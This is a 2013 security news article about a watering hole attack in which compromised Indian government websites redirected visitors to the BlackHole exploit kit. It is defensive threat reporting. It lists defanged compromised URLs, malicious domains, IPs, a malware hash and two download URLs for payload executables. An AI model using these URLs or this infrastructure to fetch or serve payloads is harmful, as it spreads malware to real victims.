• Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
MUST READ

Qilin ransomware claimed responsibility for the attack on the beer giant Asahi

 | 

DragonForce, LockBit, and Qilin, a new triad aims to dominate the ransomware landscape

 | 

DraftKings thwarts credential stuffing attack, but urges password reset and MFA

 | 

Redis patches 13-Year-Old Lua flaw enabling Remote Code Execution

 | 

U.S. CISA adds Synacor Zimbra Collaboration Suite (ZCS) flaw to its Known Exploited Vulnerabilities catalog

 | 

GoAnywhere MFT zero-day used by Storm-1175 in Medusa ransomware campaigns

 | 

CrowdStrike ties Oracle EBS RCE (CVE-2025-61882) to Cl0p attacks began Aug 9, 2025

 | 

Discord discloses third-party breach affecting customer support data

 | 

Oracle patches critical E-Business Suite flaw exploited by Cl0p hackers

 | 

LinkedIn sues ProAPIs for $15K/Month LinkedIn data scraping scheme

 | 

Zimbra users targeted in zero-day exploit using iCalendar attachments

 | 

Reading the ENISA Threat Landscape 2025 report

 | 

Ghost in the Cloud: Weaponizing AWS X-Ray for Command & Control

 | 

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 65

 | 

Security Affairs newsletter Round 544 by Pierluigi Paganini – INTERNATIONAL EDITION

 | 

GreyNoise detects 500% surge in scans targeting Palo Alto Networks portals

 | 

U.S. CISA adds Smartbedded Meteobridge, Samsung, Juniper ScreenOS, Jenkins, and GNU Bash flaws to its Known Exploited Vulnerabilities catalog

 | 

ShinyHunters Launches Data Leak Site: Trinity of Chaos Announces New Ransomware Victims

 | 

ProSpy, ToSpy malware pose as Signal and ToTok to steal data in UAE

 | 

Google warns of Cl0p extortion campaign against Oracle E-Business users

 | 
  • Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
  • Home
  • Cyber warfare
  • Hacking
  • Watering hole attacks and exploit kits – Indian gov site case

Watering hole attacks and exploit kits – Indian gov site case

Pierluigi Paganini May 27, 2013

Number of Watering hole attacks is increasing, most of them based on well known exploit kits. The case of compromised Indian gov Web site leads to BlackHole

Watering Hole attacks increase in a meaningful way in the last years following a scaring trend, the technique is based on infection of website’s visitors, typically attackers use to compromise legitimate websites with a “drive-by” exploit.

Watering Hole technique has been observed since 2009 when civil society organizations were attacked  with this method and used as a channel to deliver 0-day exploits to specific targets.

The techniques results ideal for the impairment of selected targets, individuals or limited communities, that search for specific contents proposed by website used to deliver malicious code.

Efficiency of Watering Hole attacks increase with the use made by attackers of zero-day exploits that affect victim’s software, in this case victims has no way to protect their systems from the malware diffusion.

Once a victim visits the page on the compromised website a backdoor trojan is installed on his computer, Watering Hole method of attacks is very common for cyber espionage operation or state sponsored attacks. Governments are the primary buyers for zero-day exploits that are used to exploit victim’s machine remaining uncovered for long periods, the capability to remain silent during the time is determinant for the success of the attack.

A recent post published by Dancho Danchev revealed that a Compromised Indian government Web site leads to Black Hole Exploit Kit, the researchers at Webroot firm detected the infection interested the web site of the Ministry of Micro And Medium Enterprises (MSME DI Jaipur).

The researchers tried to profile the campaign discovering that the Black Hole Exploit Kit serving URL was used for other previous client-side exploit serving campaigns, in 2012 the same IP was also seen in fact during a malvertising campaign.

Watering Hole Indian Government Website

The researchers provided in the post the list of malicious domain name used for the attack and sample of compromised URLs, following the details of the investigation.

Sample compromised URLs:
 hxxp://sisijaipur.gov.in/cluster_developement.html
 hxxp://msmedijaipur.gov.in/cluster_developement.html
Malicious domain names/redirectors reconnaissance:
 888-move-stuff.com – 50.63.202.21 – Email: van2move@yahoo.com
 888movestuff.com – 208.109.181.190 – Email: van2move@yahoo.com
 jobbelts.com (redirector/C&C) – 98.124.198.1 – 
 Email: aanelli@yahoo.com
More malicious domains are known to have been 
responding to the same IP in the past (98.124.198.1):
 adventure-holiday-specials.com
 appraisingla.com
 arc-res.com
 a-to-z-of-barbados.com
 bookmarkingdemonx.com
 ceointerns.com
 charityairsupport.org
 csepros.com
 dominateseowithwordpress.com
 enum365.com
 jobbelts.com
 karenbrowntx.com
 rankbuilder2.net
 seopressors.org
 stopchasingmoney.com
 thefamily4life.org
 ventergy.com

To have an idea of the efficiency of the malware used by attackers, known as Trojan:JS/BlacoleRef.W; Trojan-Downloader.JS.Iframe.czf having MD5 equal to 44a8c0b8d281f17b7218a0fe09840ce9, it is useful to evaluate the detection rate for the malware that is 24 out of 27 antivirus. Despite the The Black Hole Exploit Kit redirecting URL that compromised the Indian government Web site is currently not accepting any connections,  the security experts at Webroot noted that it was working on 2012-07-03 08:04:36 delivering malicious content.

The Sample redirection chain discovered by the researcher is

Watering Hole Indian Web site Exploit chain

 

Once exploited the client application on the victim’s machine it is dropped the Trojan-Ransom.Win32.Birele.vjr, aka PWS:Win32/Fareit.gen!C and then additional malware are downloaded from:

hxxp://euxtoncorinthiansfc.co.uk/pd.exe
hxxp://euxtoncorinthiansfc.co.uk/1689.exe

Attacks like this one are becoming very popular, early 2013 Solutionary’s Security Engineering Research Team published an interesting study that revealed the rise of exploit kits mainly originated in Russia.

BlackHole 2.0 is considered most popular and pervasive exploit kit despite it exploits fewer vulnerabilities than other kits do. Over 18% of the malware instance detected were directly attributed to The BlackHole exploit kit that is a web application that exploit known vulnerabilities in most popular applications, frameworks and browsers such as Adobe Reader, Adobe Flash and Java.

Exploit kits

Watering Hole is much more efficient if compared to a spear phishing attack in which the success of the operation depend on the recipient clicking the link or opening an attachment. There’s an high probability that victim discard the malicious email, even if malware is able to elude antivirus detection due the presence of a zero-day exploit. Watering Hole allows to overcome this difficulty compromising and infect a website victim is likely to visit.

What to expect from the future?

Security experts have no doubts, the number of watering hole attacks is destined grow in the next months due the large diffusion of exploit kits in the black market and despite the impairment of a target website is much more difficult of other methods of attack.

Pierluigi Paganini

(Security Affairs – Watering Hole attack)


facebook linkedin twitter

0-day cyber espionage Dancho Danchev exploit kit Black Hole malware spear phishing targeted attacks watering hole Webroot

you might also like

Pierluigi Paganini October 08, 2025
DragonForce, LockBit, and Qilin, a new triad aims to dominate the ransomware landscape
Read more
Pierluigi Paganini October 08, 2025
DraftKings thwarts credential stuffing attack, but urges password reset and MFA
Read more

leave a comment

newsletter

Subscribe to my email list and stay
up-to-date!

    recent articles

    Qilin ransomware claimed responsibility for the attack on the beer giant Asahi

    Cyber Crime / October 08, 2025

    DragonForce, LockBit, and Qilin, a new triad aims to dominate the ransomware landscape

    Cyber Crime / October 08, 2025

    DraftKings thwarts credential stuffing attack, but urges password reset and MFA

    Security / October 08, 2025

    Redis patches 13-Year-Old Lua flaw enabling Remote Code Execution

    Security / October 08, 2025

    U.S. CISA adds Synacor Zimbra Collaboration Suite (ZCS) flaw to its Known Exploited Vulnerabilities catalog

    Hacking / October 07, 2025

    To contact me write an email to:

    Pierluigi Paganini :
    pierluigi.paganini@securityaffairs.co

    LEARN MORE

    QUICK LINKS

    • Home
    • Cyber Crime
    • Cyber warfare
    • APT
    • Data Breach
    • Deep Web
    • Digital ID
    • Hacking
    • Hacktivism
    • Intelligence
    • Internet of Things
    • Laws and regulations
    • Malware
    • Mobile
    • Reports
    • Security
    • Social Networks
    • Terrorism
    • ICS-SCADA
    • POLICIES
    • Contact me

    Copyright@securityaffairs 2024

    We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies. However, you may visit "Cookie Settings" to provide a controlled consent.
    Cookie SettingsAccept All
    Manage consent

    Privacy Overview

    This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities...
    Necessary
    Always Enabled
    Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
    Non-necessary
    Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
    SAVE & ACCEPT